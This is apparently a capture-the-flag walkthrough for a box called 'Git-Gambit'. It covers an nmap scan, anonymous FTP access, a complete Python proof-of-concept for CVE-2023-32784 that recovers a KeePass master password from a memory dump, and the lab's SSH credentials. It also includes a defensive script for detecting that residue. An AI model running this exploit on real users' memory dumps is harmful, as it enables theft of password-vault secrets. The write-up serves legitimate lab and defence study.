
NMAP Recon and CVE-2023-32784 Analysis

The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using KeePass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

Uploaded by

mrgods.home

Git-Gambit

Recon
Let's start with Nmap

sudo nmap -sCV [Link] -p-

Anonymous login is allowed on FTP

ftp anonymous@[Link] -p 5555


Download both

When I unzipped,
When googling, I found this:

import argparse
import logging
import itertools


class TaggedFormatter(logging.Formatter):
    # Replace each log level name with a coloured one-character tag
    TAGS = {
        'DEBUG': '\x1b[1;35m#\x1b[0m',
        'INFO': '\x1b[1;34m.\x1b[0m',
        'WARNING': '\x1b[1;33m-\x1b[0m',
        'ERROR': '\x1b[1;31m!\x1b[0m',
        'CRITICAL': '\x1b[1;31m!!\x1b[0m'
    }

    def __init__(self, format):
        logging.Formatter.__init__(self, format)

    def format(self, record):
        levelname = record.levelname

        if levelname in self.TAGS:
            record.levelname = self.TAGS[levelname]

        return logging.Formatter.format(self, record)


def setup_logging(debug=False):
    formatter = TaggedFormatter('%(asctime)s [%(levelname)s] [%(name)s] %(message)s')
    handler = logging.StreamHandler()
    root_logger = logging.getLogger()

    handler.setFormatter(formatter)
    root_logger.addHandler(handler)

    if debug:
        root_logger.setLevel(logging.DEBUG)
    else:
        root_logger.setLevel(logging.INFO)


def parse_args():
    parser = argparse.ArgumentParser(description='CVE-2023-32784 proof-of-concept')

    parser.add_argument('dump', type=str,
                        help='The path of the memory dump to analyze')
    parser.add_argument('-d', '--debug', dest='debug', action='store_true',
                        help='Enable debugging mode')

    return parser.parse_args()


def get_candidates(dump_file):
    data = dump_file.read()
    candidates = []
    str_len = 0
    i = 0

    while i < len(data) - 1:
        # 0xCF 0x25 is the UTF-16LE encoding of the placeholder character U+25CF
        if (data[i] == 0xCF) and (data[i + 1] == 0x25):
            str_len += 1
            i += 1
        elif str_len > 0:
            # A run of placeholders followed by one printable UTF-16LE character
            if (data[i] >= 0x20) and (data[i] <= 0x7E) and (data[i + 1] == 0x00):
                candidate = (str_len * b'\xCF\x25') + bytes([data[i], data[i + 1]])

                if candidate not in candidates:
                    candidates.append(candidate)

            str_len = 0

        i += 1

    return candidates


if __name__ == '__main__':
    args = parse_args()
    setup_logging(args.debug)
    logger = logging.getLogger('main')

    with open(args.dump, 'rb') as dump_file:
        logger.info(f'Opened {dump_file.name}')

        candidates = get_candidates(dump_file)
        if not candidates:
            # max() below would raise ValueError on an empty list
            logger.error('No candidates found in the dump')
            raise SystemExit(1)

        candidates = [x.decode('utf-16-le') for x in candidates]
        # groups[n] collects the characters seen at position n + 1
        groups = [[] for i in range(max([len(i) for i in candidates]))]

        for candidate in candidates:
            groups[len(candidate) - 1].append(candidate[-1])

        # Positions with no recovered character keep the placeholder
        for i in range(len(groups)):
            if len(groups[i]) == 0:
                groups[i].append(b'\xCF\x25'.decode('utf-16-le'))

        for password in itertools.product(*groups):
            password = ''.join(password)
            print(f'Possible password: {password}')

Password : strongpassherehello
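A triage check built on the same byte pattern the script above searches for (runs of CF 25 followed by a printable UTF-16LE character). It is an added example, not part of the original write-up or of the proof-of-concept: it reports only which run lengths are present, never the trailing characters, so a responder can decide whether a memory dump has to be handled as exposing the vault password. The function names, the `MIN_CONTIGUOUS` threshold and the sample buffer are assumptions constructed for illustration.

```python
from collections import Counter

PLACEHOLDER = b"\xcf\x25"  # U+25CF as UTF-16LE, the pair the script above matches
MIN_CONTIGUOUS = 3         # assumed threshold: fewer consecutive lengths counts as noise


def residue_profile(data: bytes) -> Counter:
    """Count placeholder runs ending in a printable UTF-16LE character, by run length.

    The trailing character is never stored, so the result can go into a ticket.
    """
    profile, run, i = Counter(), 0, 0
    while i < len(data) - 1:
        if data[i:i + 2] == PLACEHOLDER:
            run += 1
            i += 2
            continue
        if run and 0x20 <= data[i] <= 0x7E and data[i + 1] == 0x00:
            profile[run] += 1
        run = 0
        i += 1
    return profile


def assess(data: bytes) -> dict:
    """Summarise the profile; consecutive run lengths are what one typed secret leaves."""
    lengths = sorted(residue_profile(data))
    best = cur = 0
    prev = None
    for n in lengths:
        cur = cur + 1 if prev is not None and n == prev + 1 else 1
        best = max(best, cur)
        prev = n
    return {"run_lengths": lengths, "longest_contiguous": best,
            "likely_exposed": best >= MIN_CONTIGUOUS}


def constructed_dump(typed: str = "Demo!") -> bytes:
    """Constructed sample (not real memory): one residue string per typed position."""
    parts = [b"\x00\x11junk\x00"]
    for n in range(1, len(typed)):
        parts.append(PLACEHOLDER * n + typed[n].encode("utf-16-le") + b"\x00\x00junk")
    return b"".join(parts)


if __name__ == "__main__":
    print(assess(constructed_dump()))                       # residue present
    print(assess(b"\x00" * 64 + PLACEHOLDER + b"A\x00"))    # single stray hit
```

A dump flagged `likely_exposed` should be stored and shared with the same care as the vault password itself.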

Install KeePass on Windows to open [Link]


There I found a user:

john : YvbseSFRp2Ed4DCjTucNKB

Yes, it is SSH creds. Logged in.


Got [Link]!
